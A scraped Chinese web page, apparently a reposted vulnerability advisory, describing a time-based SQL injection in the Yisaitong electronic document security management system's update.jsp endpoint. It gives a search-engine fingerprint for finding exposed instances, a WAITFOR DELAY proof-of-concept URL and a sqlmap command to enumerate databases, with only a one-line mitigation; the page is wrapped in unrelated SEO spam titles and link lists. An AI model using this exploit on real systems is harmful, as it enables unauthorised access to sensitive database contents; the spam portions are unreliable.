当前位置: 首页 > news >正文

义乌网站建设工作室网络公司名字大全

义乌网站建设工作室,网络公司名字大全,威海网站定制,常见网站类型目录 0x01 漏洞介绍 0x02 影响产品 0x03 语法特征 0x04 漏洞复现页面 0x05 漏洞修复建议 0x01 漏洞介绍 亿赛通电子文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品之一,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台&#…

目录

0x01 漏洞介绍

0x02 影响产品

0x03 语法特征

0x04 漏洞复现页面

0x05 漏洞修复建议


0x01 漏洞介绍

亿赛通电子文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品之一,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。该漏洞存在与/update接口下,flag对输入的数据没有进行严格的过滤而导致SQL注入,攻击者可以利用该漏洞获取数据库敏感信息。
 

0x02 影响产品

  1. 亿赛通电子文档安全管理系统

0x03 语法特征

  1. app="亿赛通-电子文档安全管理系统"

0x04 漏洞复现
页面
 

图片


POC

 
  1. CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3);WAITFOR%20DELAY%20%270:0:值%27--

修改值的大小 对应延迟时间
 

图片

图片

 
  1. python3 sqlmap.py -u "https://xxxxx/CDGServer3/workflowE/useractiv

  2. ate/update.jsp?flag=1&ids=1,3)" --batch --dbs

图片

0x05 漏洞修复建议

设置防火墙规则,过滤漏洞相关的敏感链接监测

图片

                                                   没看够~?欢迎关注扫一扫~

http://www.rdtb.cn/news/2861.html

相关文章:

  • 四川电脑网站建设长沙网站优化推广方案
  • 广州网站建设联系信科海珠百度指数专业版价格
  • asp网站变慢怎么样做免费的百度seo
  • wordpress建企业网站教程网络营销项目策划书
  • ps做网站首页效果特效百度推广怎么收费的
  • 做的成功的地方网站百度网站官网入口网址
  • 顺义电大网上作业在那个网站做在百度如何发布作品
  • 企业做的网站开发费如何入帐seo权重优化软件
  • 网站建设毕业论文北京培训学校
  • 网站公司注册流程sem分析是什么
  • 安徽网站备案网络广告营销成功案例
  • 和朋友合伙做网站营销策划
  • 宫免费网站网站关键词搜索
  • 一键抓取的网站怎么做seo搜索推广费用多少
  • 建立自己的购物网站品牌整合营销推广
  • 漳州建设局网站首页百度seo查询
  • 厦门建设厅查询网站今天重大新闻事件
  • 淘宝做轮播广告哪个网站好南平网站seo
  • 邦策网站建设长沙网站推广
  • 武汉做网站企业获取排名
  • 做网站 数据标准seo流量是什么
  • 静态网站分页网络推广是做什么工作的
  • 建设网站公司宝鸡百度seo2022
  • 中国建筑装饰网唐迪夫优化大师windows
  • 烟台外贸网站建设网站关键词优化价格
  • 深圳知名网站建设平台优秀网站设计网站
  • 网站文章更新怎么做百度网站下拉排名
  • wordpress弹性搜索seo教学视频教程
  • 网站空间流量手机网站搜索优化
  • 男女做爰视频免费网站百度seo排名查询